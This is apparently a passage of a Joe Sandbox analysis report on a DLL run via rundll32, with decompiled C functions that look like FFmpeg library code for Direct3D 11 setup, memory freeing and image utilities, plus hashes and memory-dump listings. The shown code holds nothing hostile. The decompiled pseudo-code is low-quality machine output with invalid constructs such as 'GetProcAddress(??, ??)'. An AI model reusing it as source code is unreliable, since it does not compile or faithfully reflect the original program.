                                                                      • String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
                                                                      • API String ID: 3083893021-1306170362
                                                                      • Opcode ID: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
                                                                      • Instruction ID: 96990cf085468aa9ba630c0c0793423886e9eba89b3e303bf26647e4a11a856d
                                                                      • Opcode Fuzzy Hash: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
                                                                      • Instruction Fuzzy Hash: 8BB1A675A087068BD714EF28C48066EB7E1FF882D0F55892EE989C7345EB31ED44CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
                                                                      • String ID: Microsoft Primitive Provider$N$RNG
                                                                      • API String ID: 4139849330-2077157618
                                                                      • Opcode ID: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
                                                                      • Instruction ID: 55d25eed0a1b74d277015fe739bb6a08acfe9f0c77a35e4a57d9ad1f3d4738c5
                                                                      • Opcode Fuzzy Hash: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
                                                                      • Instruction Fuzzy Hash: E891A075A043508FE304DF78C9C021ABBE2FBC9311F51897EE9889B365EB75D9448B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E1001F523(intOrPtr _a4, intOrPtr _a12) {
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v96;
                                                                      				signed int _v100;
                                                                      				char _v320;
                                                                      				char _v328;
                                                                      				intOrPtr _v336;
                                                                      				intOrPtr _v344;
                                                                      				intOrPtr _v352;
                                                                      				void* _v356;
                                                                      				signed int _v360;
                                                                      				char _v364;
                                                                      				intOrPtr* _v368;
                                                                      				intOrPtr _v376;
                                                                      				intOrPtr _v384;
                                                                      				signed int _v388;
                                                                      				char _v392;
                                                                      				void* _v396;
                                                                      				intOrPtr _v400;
                                                                      				intOrPtr* _v404;
                                                                      				intOrPtr* _v408;
                                                                      				void* _v412;
                                                                      				CHAR* _v416;
                                                                      				signed int _v420;
                                                                      				char _v424;
                                                                      				int _v428;
                                                                      				void* _v452;
                                                                      				char* _v456;
                                                                      				intOrPtr _v460;
                                                                      				char _v464;
                                                                      				intOrPtr _v468;
                                                                      				intOrPtr _v472;
                                                                      				char _v476;
                                                                      				intOrPtr _v480;
                                                                      				void* _t93;
                                                                      				struct HINSTANCE__* _t94;
                                                                      				intOrPtr _t102;
                                                                      				void* _t108;
                                                                      				intOrPtr* _t109;
                                                                      				char _t110;
                                                                      				void* _t111;
                                                                      				intOrPtr* _t112;
                                                                      				intOrPtr* _t115;
                                                                      				void* _t116;
                                                                      				struct HINSTANCE__* _t117;
                                                                      				_Unknown_base(*)()* _t118;
                                                                      				void* _t119;
                                                                      				intOrPtr* _t120;
                                                                      				intOrPtr* _t122;
                                                                      				intOrPtr* _t124;
                                                                      				void* _t127;
                                                                      				void* _t134;
                                                                      				int _t136;
                                                                      				void* _t140;
                                                                      				intOrPtr* _t142;
                                                                      				intOrPtr* _t144;
                                                                      				_Unknown_base(*)()* _t146;
                                                                      				intOrPtr _t147;
                                                                      				signed int _t152;
                                                                      				char _t155;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t163;
                                                                      				intOrPtr _t164;
                                                                      				intOrPtr _t165;
                                                                      				intOrPtr* _t169;
                                                                      				intOrPtr* _t191;
                                                                      				intOrPtr _t194;
                                                                      				void* _t195;
                                                                      				void* _t198;
                                                                      				void* _t200;
                                                                      				void* _t201;
                                                                      				intOrPtr* _t202;
                                                                      				intOrPtr* _t204;
                                                                      				intOrPtr* _t205;
                                                                      
                                                                      				_v328 = 0;
                                                                      				_t191 =  *((intOrPtr*)(_a4 + 0xc));
                                                                      				_t93 = E100110D0(_a12, "debug", 0, 0);
                                                                      				_t94 = LoadLibraryA("d3d11_1sdklayers.dll");
                                                                      				_t200 = _t198 - 0x178;
                                                                      				if(_t93 == 0 || _t94 == 0) {
                                                                      					_t194 = 0x800;
                                                                      					_v344 = 0;
                                                                      				} else {
                                                                      					_t194 = 0x802;
                                                                      					_v344 = 1;
                                                                      				}
                                                                      				_v396 = 0x100d7268;
                                                                      				_v320 = 0;
                                                                      				_t152 =  &_v320;
                                                                      				_v384 = 0;
                                                                      				_v388 = _t152;
                                                                      				_v392 = 0;
                                                                      				__imp__InitOnceBeginInitialize();
                                                                      				_t201 = _t200 - 0x10;
                                                                      				if(_v336 != 0) {
                                                                      					_v356 = L100A7C1C("d3d11.dll", 0, 0);
                                                                      					_t102 = L100A7C1C("dxgi.dll", 0, 0);
                                                                      					_t155 = _v356;
                                                                      					if(_t155 != 0) {
                                                                      						_v352 = _t102;
                                                                      						if(_t102 != 0) {
                                                                      							_v412 = _t155;
                                                                      							_v408 = "D3D11CreateDevice";
                                                                      							_v356 = GetProcAddress;
                                                                      							_t146 = GetProcAddress(??, ??);
                                                                      							_v416 = "CreateDXGIFactory1";
                                                                      							_t169 = _v364;
                                                                      							 *0x100d7260 = _t146;
                                                                      							_v420 = _v360;
                                                                      							_t147 =  *_t169(0, 0);
                                                                      							_push(_t169);
                                                                      							_push(_t169);
                                                                      							 *0x100d7264 = _t147;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_v412 = 0x100d7268;
                                                                      				_v404 = 0;
                                                                      				_v408 = 0;
                                                                      				__imp__InitOnceComplete();
                                                                      				_t202 = _t201 - 0xc;
                                                                      				if( *0x100d7260 == 0) {
                                                                      					L29:
                                                                      					E10026560(_v24, 0x10, "Failed to load D3D11 library or its functions\n");
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t109 =  *0x100d7264;
                                                                      					if(_t109 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					if(_v20 != 0) {
                                                                      						_v420 = _t152;
                                                                      						_v424 = 0x100c75a0;
                                                                      						_t134 =  *_t109();
                                                                      						_t202 = _t202 - 8;
                                                                      						if(_t134 >= 0) {
                                                                      							 *_t202 = _v28;
                                                                      							_t136 = atoi(??);
                                                                      							_v424 =  &_v364;
                                                                      							_v428 = _t136;
                                                                      							 *_t202 = _v356;
                                                                      							_t140 =  *((intOrPtr*)( *_v356 + 0x1c))();
                                                                      							_t205 = _t202 - 0xc;
                                                                      							if(_t140 < 0) {
                                                                      								_v376 = 0;
                                                                      								_t142 = _v368;
                                                                      								 *_t205 = _t142;
                                                                      								 *((intOrPtr*)( *_t142 + 8))();
                                                                      								_t202 = _t205 - 4;
                                                                      							} else {
                                                                      								_t144 = _v368;
                                                                      								 *_t205 = _t144;
                                                                      								 *((intOrPtr*)( *_t144 + 8))();
                                                                      								_t202 = _t205 - 4;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t110 = _v356;
                                                                      					if(_t110 != 0) {
                                                                      						_v420 = _t152;
                                                                      						_v424 = _t110;
                                                                      						_t127 =  *((intOrPtr*)( *_t110 + 0x20))();
                                                                      						_t202 = _t202 - 8;
                                                                      						if(_t127 >= 0) {
                                                                      							_v412 = _t152;
                                                                      							_v416 = _v96;
                                                                      							_v420 = _v100;
                                                                      							_v424 = "Using device %04x:%04x (%ls).\n";
                                                                      							_v428 = 0x20;
                                                                      							 *_t202 = _v32;
                                                                      							E10026560();
                                                                      						}
                                                                      						_t110 = _v364;
                                                                      					}
                                                                      					_v412 = _t194;
                                                                      					_v388 = 0;
                                                                      					_v392 = 0;
                                                                      					_v400 = 7;
                                                                      					_v404 = 0;
                                                                      					_v408 = 0;
                                                                      					_v396 = _t191;
                                                                      					_v416 = 0;
                                                                      					_v420 = 0 | _t110 == 0x00000000;
                                                                      					_v424 = _t110;
                                                                      					_t111 =  *0x100d7260();
                                                                      					_t202 = _t202 - 0x28;
                                                                      					_t195 = _t111;
                                                                      					_t112 = _v396;
                                                                      					if(_t112 != 0) {
                                                                      						_v464 = _t112;
                                                                      						 *((intOrPtr*)( *_t112 + 8))();
                                                                      						_t202 = _t202 - 4;
                                                                      					}
                                                                      					if(_t195 < 0) {
                                                                      						E10026560(_v64, 0x10, "Failed to create Direct3D device (%lx)\n", _t195);
                                                                      						L30:
                                                                      						_t108 = 0xb1b4b1ab;
                                                                      						goto L19;
                                                                      					} else {
                                                                      						_t115 =  *_t191;
                                                                      						_v456 =  &_v392;
                                                                      						_v460 = 0x100c70d0;
                                                                      						_v464 = _t115;
                                                                      						_t116 =  *((intOrPtr*)( *_t115))();
                                                                      						_t202 = _t202 - 0xc;
                                                                      						if(_t116 >= 0) {
                                                                      							_t122 = _v404;
                                                                      							_v472 = 1;
                                                                      							_v476 = _t122;
                                                                      							 *((intOrPtr*)( *_t122 + 0x14))();
                                                                      							_t204 = _t202 - 8;
                                                                      							_t124 = _v412;
                                                                      							 *_t204 = _t124;
                                                                      							 *((intOrPtr*)( *_t124 + 8))();
                                                                      							_t202 = _t204 - 4;
                                                                      						}
                                                                      						if(_v424 != 0) {
                                                                      							_t117 = LoadLibraryA("dxgidebug.dll");
                                                                      							_t202 = _t202 - 4;
                                                                      							if(_t117 != 0) {
                                                                      								_t118 = GetProcAddress(_t117, "DXGIGetDebugInterface");
                                                                      								_t202 = _t202 - 8;
                                                                      								if(_t118 != 0) {
                                                                      									_v472 = _t152;
                                                                      									_v400 = 0;
                                                                      									_v476 = 0x100c7530;
                                                                      									_t119 =  *_t118();
                                                                      									_t202 = _t202 - 8;
                                                                      									if(_t119 >= 0) {
                                                                      										_t120 = _v408;
                                                                      										if(_t120 != 0) {
                                                                      											_v464 = 7;
                                                                      											_t162 =  *0x100c6e30; // 0xe48ae283
                                                                      											 *_t202 = _t120;
                                                                      											_v480 = _t162;
                                                                      											_t163 =  *0x100c6e34; // 0x490bda80
                                                                      											_v476 = _t163;
                                                                      											_t164 =  *0x100c6e38; // 0xe943e687
                                                                      											_v472 = _t164;
                                                                      											_t165 =  *0x100c6e3c; // 0x8dacfa9
                                                                      											_v468 = _t165;
                                                                      											 *((intOrPtr*)( *_t120 + 0xc))();
                                                                      											_t202 = _t202 - 0x18;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t108 = 0;
                                                                      						L19:
                                                                      						return _t108;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InitOnce$BeginCompleteInitializeLibraryLoadmv_dict_get
                                                                      • String ID: DXGIGetDebugInterface$Failed to create Direct3D device (%lx)$Failed to load D3D11 library or its functions$Using device %04x:%04x (%ls).$d3d11.dll$debug$dxgi.dll
                                                                      • API String ID: 2640887736-2754084114
                                                                      • Opcode ID: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
                                                                      • Instruction ID: b26665e88cdb3ff3bd93bc6ff27e16a968a577adae798b8ccfa67922602f4651
                                                                      • Opcode Fuzzy Hash: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
                                                                      • Instruction Fuzzy Hash: 4EB1E4B4A087419FD354EF69D58462ABBF1FF89740F41892EE989CB354EB34D884CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E100132D0() {
                                                                      				void* _t43;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t63;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				signed int _t72;
                                                                      				signed int _t73;
                                                                      				signed int _t74;
                                                                      				signed int _t75;
                                                                      				intOrPtr* _t78;
                                                                      				intOrPtr* _t84;
                                                                      				intOrPtr* _t87;
                                                                      				intOrPtr* _t93;
                                                                      				void* _t94;
                                                                      				intOrPtr* _t95;
                                                                      
                                                                      				_t95 = _t94 - 0x2c;
                                                                      				_t87 =  *((intOrPtr*)(_t95 + 0x40));
                                                                      				if(_t87 != 0) {
                                                                      					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
                                                                      						L4:
                                                                      						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
                                                                      						if(_t84 == 0) {
                                                                      							L21:
                                                                      							 *_t95 =  *_t87;
                                                                      							L23();
                                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 8));
                                                                      							L23();
                                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
                                                                      							L23();
                                                                      							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
                                                                      							return __imp___aligned_free();
                                                                      						}
                                                                      						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
                                                                      							L8:
                                                                      							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
                                                                      							if(_t93 == 0) {
                                                                      								L20:
                                                                      								 *_t95 =  *_t84;
                                                                      								L23();
                                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 8));
                                                                      								L23();
                                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
                                                                      								L23();
                                                                      								 *_t95 = _t84;
                                                                      								L23();
                                                                      								goto L21;
                                                                      							}
                                                                      							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
                                                                      								L12:
                                                                      								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
                                                                      								if(_t78 == 0) {
                                                                      									L19:
                                                                      									 *_t95 =  *_t93;
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 8));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
                                                                      									L23();
                                                                      									 *_t95 = _t93;
                                                                      									L23();
                                                                      									goto L20;
                                                                      								}
                                                                      								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
                                                                      									L16:
                                                                      									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
                                                                      									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
                                                                      										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      										L10012850(_t55);
                                                                      										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      									}
                                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      									 *_t95 =  *_t78;
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      									L23();
                                                                      									goto L19;
                                                                      								}
                                                                      								_t72 = 0;
                                                                      								do {
                                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
                                                                      									_t72 = _t72 + 1;
                                                                      									 *_t95 = _t61;
                                                                      									L23();
                                                                      									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
                                                                      								goto L16;
                                                                      							}
                                                                      							_t73 = 0;
                                                                      							do {
                                                                      								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
                                                                      								_t73 = _t73 + 1;
                                                                      								 *_t95 = _t63;
                                                                      								L23();
                                                                      							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
                                                                      							goto L12;
                                                                      						}
                                                                      						_t74 = 0;
                                                                      						do {
                                                                      							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
                                                                      							_t74 = _t74 + 1;
                                                                      							 *_t95 = _t65;
                                                                      							L23();
                                                                      						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
                                                                      						goto L8;
                                                                      					}
                                                                      					_t75 = 0;
                                                                      					do {
                                                                      						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
                                                                      						_t75 = _t75 + 1;
                                                                      						 *_t95 = _t67;
                                                                      						L23();
                                                                      					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t43;
                                                                      			}



















                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
                                                                      • Instruction ID: aab0cb6abdf460125275c6e5ebe0c2fb3ff18ba6de562b5529d80b352c1cac01
                                                                      • Opcode Fuzzy Hash: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
                                                                      • Instruction Fuzzy Hash: 14519F79A047098FCB50EFA9D0C5A5AF7F0FF44250F41892DE8998B301DA71F985CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E1002334C(signed int __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				unsigned int _t304;
                                                                      				char* _t305;
                                                                      				signed int _t314;
                                                                      				signed int _t316;
                                                                      				signed int _t325;
                                                                      				signed int _t330;
                                                                      				signed int _t331;
                                                                      				signed int _t332;
                                                                      				int _t335;
                                                                      				signed int _t336;
                                                                      				signed int _t338;
                                                                      				signed int _t342;
                                                                      				signed int _t344;
                                                                      				signed int _t347;
                                                                      				signed int _t348;
                                                                      				signed char* _t350;
                                                                      				signed int _t351;
                                                                      				int _t352;
                                                                      				signed int _t354;
                                                                      				int _t355;
                                                                      				signed int _t356;
                                                                      				signed int _t358;
                                                                      				int _t361;
                                                                      				signed int _t362;
                                                                      				void _t364;
                                                                      				signed int _t365;
                                                                      				signed int _t367;
                                                                      				signed int _t369;
                                                                      				signed int _t372;
                                                                      				intOrPtr _t379;
                                                                      				intOrPtr _t380;
                                                                      				intOrPtr _t381;
                                                                      				intOrPtr _t382;
                                                                      				intOrPtr _t383;
                                                                      				intOrPtr _t384;
                                                                      				signed int _t386;
                                                                      				signed int _t388;
                                                                      				char* _t389;
                                                                      				signed int _t393;
                                                                      				signed char _t398;
                                                                      				void* _t399;
                                                                      				char* _t405;
                                                                      				char _t406;
                                                                      				char* _t408;
                                                                      				signed int _t409;
                                                                      				signed char _t411;
                                                                      				signed int _t413;
                                                                      				signed int _t414;
                                                                      				signed int _t417;
                                                                      				signed int _t418;
                                                                      				signed short _t425;
                                                                      				void* _t429;
                                                                      				char* _t430;
                                                                      				unsigned int _t434;
                                                                      				signed int _t435;
                                                                      				signed int _t437;
                                                                      				signed char _t439;
                                                                      				signed char* _t440;
                                                                      				unsigned int _t441;
                                                                      				signed int _t442;
                                                                      				int _t444;
                                                                      				signed char _t449;
                                                                      				void* _t450;
                                                                      				signed int _t453;
                                                                      				signed int _t454;
                                                                      				intOrPtr _t455;
                                                                      				signed char _t456;
                                                                      				signed char _t457;
                                                                      				int _t458;
                                                                      				char* _t463;
                                                                      				char* _t464;
                                                                      				signed int _t465;
                                                                      				signed int _t467;
                                                                      				signed int _t471;
                                                                      				signed int _t474;
                                                                      				signed int _t475;
                                                                      				signed int _t477;
                                                                      				signed int _t479;
                                                                      				signed int* _t484;
                                                                      				signed int _t489;
                                                                      				signed int _t494;
                                                                      				void _t495;
                                                                      				char* _t496;
                                                                      				signed int _t498;
                                                                      				void* _t499;
                                                                      				signed int _t501;
                                                                      				void* _t502;
                                                                      				void* _t503;
                                                                      				signed int _t507;
                                                                      				intOrPtr _t508;
                                                                      				intOrPtr _t509;
                                                                      				void* _t514;
                                                                      				signed int _t517;
                                                                      				char* _t519;
                                                                      				signed int _t526;
                                                                      				signed int _t528;
                                                                      				int _t533;
                                                                      				signed int _t534;
                                                                      				void* _t537;
                                                                      				signed int* _t538;
                                                                      				signed int _t539;
                                                                      				char* _t540;
                                                                      				void* _t541;
                                                                      				unsigned int _t543;
                                                                      				unsigned int _t544;
                                                                      				signed int _t545;
                                                                      				signed int _t547;
                                                                      				signed int _t548;
                                                                      				signed int _t549;
                                                                      				signed int _t550;
                                                                      				signed int _t552;
                                                                      				int _t553;
                                                                      				void* _t554;
                                                                      				char** _t555;
                                                                      				signed int* _t557;
                                                                      				void* _t571;
                                                                      
                                                                      				_t465 = __edx;
                                                                      				_t555 = _t554 - 0x6c;
                                                                      				_t408 = _t555[0x24];
                                                                      				_t519 = _t555[0x22];
                                                                      				_t555[3] = _t555[0x27];
                                                                      				 *_t555 = _t408;
                                                                      				_t555[2] = _t555[0x26];
                                                                      				_t555[1] = _t555[0x25];
                                                                      				_t304 = E10023180(__edx, __eflags);
                                                                      				 *_t555 = _t408;
                                                                      				_t543 = _t304;
                                                                      				_t305 = L10034790();
                                                                      				_t555[0x12] = _t305;
                                                                      				_t430 = _t305;
                                                                      				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
                                                                      					_t544 = 0xffffffea;
                                                                      					goto L28;
                                                                      				} else {
                                                                      					_t467 = _t430[4] & 0x000000ff;
                                                                      					if(_t467 == 0) {
                                                                      						_t496 = 0;
                                                                      						_t555[0xf] = 0;
                                                                      					} else {
                                                                      						_t463 =  >=  ? _t430[0x10] : 0;
                                                                      						_t555[0xf] = _t463;
                                                                      						_t496 = _t463;
                                                                      						if(_t467 != 1) {
                                                                      							_t464 = _t555[0x12];
                                                                      							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
                                                                      							_t555[0xf] = _t496;
                                                                      							if(_t467 != 2) {
                                                                      								_t405 =  >=  ? _t496 : _t464[0x38];
                                                                      								_t555[0xf] = _t405;
                                                                      								_t496 = _t405;
                                                                      								if(_t467 != 3) {
                                                                      									_t406 = _t464[0x4c];
                                                                      									_t571 = _t496 - _t406;
                                                                      									_t407 =  >=  ? _t496 : _t406;
                                                                      									_t555[0xf] =  >=  ? _t496 : _t406;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t555[1] = _t408;
                                                                      					_t555[2] = _t555[0x25];
                                                                      					 *_t555 =  &(_t555[0x14]);
                                                                      					if(E100215D0(_t571) < 0) {
                                                                      						_t555[5] = 0x209;
                                                                      						_t555[1] = 0;
                                                                      						 *_t555 = 0;
                                                                      						_t555[4] = "libavutil/imgutils.c";
                                                                      						_t555[3] = "ret >= 0";
                                                                      						_t555[2] = "Assertion %s failed at %s:%d\n";
                                                                      						E10026560();
                                                                      						abort();
                                                                      						_push(_t543);
                                                                      						_push(_t496);
                                                                      						_t557 = _t555 - 0x15c;
                                                                      						_t409 = _t557[0x5e];
                                                                      						 *_t557 = _t409;
                                                                      						_t314 = L10034790(_t408);
                                                                      						 *_t557 = _t409;
                                                                      						_t545 = _t314;
                                                                      						_t557[0xd] = L10034870(_t519);
                                                                      						_t316 = 0;
                                                                      						__eflags = 0;
                                                                      						do {
                                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
                                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
                                                                      							_t316 = _t316 + 8;
                                                                      							__eflags = _t316 - 0x80;
                                                                      						} while (_t316 < 0x80);
                                                                      						_t557[0x14] = 0;
                                                                      						_t557[0x15] = 0;
                                                                      						_t557[0x16] = 0;
                                                                      						_t557[0x17] = 0;
                                                                      						_t557[0x18] = 0;
                                                                      						_t557[0x19] = 0;
                                                                      						_t557[0x1a] = 0;
                                                                      						_t557[0x1b] = 0;
                                                                      						__eflags = _t557[0xd] - 1 - 3;
                                                                      						if(_t557[0xd] - 1 > 3) {
                                                                      							L60:
                                                                      							return 0xffffffea;
                                                                      						} else {
                                                                      							__eflags = _t545;
                                                                      							if(_t545 == 0) {
                                                                      								goto L60;
                                                                      							} else {
                                                                      								_t325 =  *(_t545 + 8);
                                                                      								_t471 = _t325 & 0x00000008;
                                                                      								_t498 = _t471;
                                                                      								__eflags = _t498;
                                                                      								if(_t498 != 0) {
                                                                      									goto L60;
                                                                      								} else {
                                                                      									_t557[0xa] = _t325 & 0x00000020;
                                                                      									__eflags = _t325 & 0x00000004;
                                                                      									if(__eflags != 0) {
                                                                      										 *_t557 = _t409;
                                                                      										_t557[2] = 0;
                                                                      										_t557[1] = _t557[0x60];
                                                                      										_t547 = E10021480(__eflags);
                                                                      										_t330 = _t409 - 9;
                                                                      										__eflags = _t330 - 1;
                                                                      										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
                                                                      										__eflags = _t409 - 9;
                                                                      										_t411 =  !=  ? _t498 : 0xff;
                                                                      										__eflags = _t557[0xd] - 1;
                                                                      										if(__eflags != 0 || __eflags == 0) {
                                                                      											goto L60;
                                                                      										} else {
                                                                      											__eflags = _t547;
                                                                      											if(_t547 <= 0) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												__eflags = _t557[0x5c];
                                                                      												if(_t557[0x5c] != 0) {
                                                                      													__eflags = _t557[0x61];
                                                                      													_t526 =  *(_t557[0x5c]);
                                                                      													if(_t557[0x61] > 0) {
                                                                      														_t335 = (_t411 & 0x000000ff) * 0x1010101;
                                                                      														__eflags = _t335;
                                                                      														do {
                                                                      															__eflags = _t547 - 8;
                                                                      															_t474 = _t547;
                                                                      															_t499 = _t526;
                                                                      															if(_t547 >= 8) {
                                                                      																__eflags = _t526 & 0x00000001;
                                                                      																if((_t526 & 0x00000001) != 0) {
                                                                      																	 *_t526 = _t335;
                                                                      																	_t499 = _t526 + 1;
                                                                      																	_t226 = _t547 - 1; // -1
                                                                      																	_t474 = _t226;
                                                                      																}
                                                                      																__eflags = _t499 & 0x00000002;
                                                                      																if((_t499 & 0x00000002) != 0) {
                                                                      																	 *_t499 = _t335;
                                                                      																	_t474 = _t474 - 2;
                                                                      																	_t499 = _t499 + 2;
                                                                      																}
                                                                      																__eflags = _t499 & 0x00000004;
                                                                      																if((_t499 & 0x00000004) != 0) {
                                                                      																	 *_t499 = _t335;
                                                                      																	_t474 = _t474 - 4;
                                                                      																	_t499 = _t499 + 4;
                                                                      																}
                                                                      																_t434 = _t474;
                                                                      																_t474 = _t474 & 0x00000003;
                                                                      																_t435 = _t434 >> 2;
                                                                      																_t335 = memset(_t499, _t335, _t435 << 2);
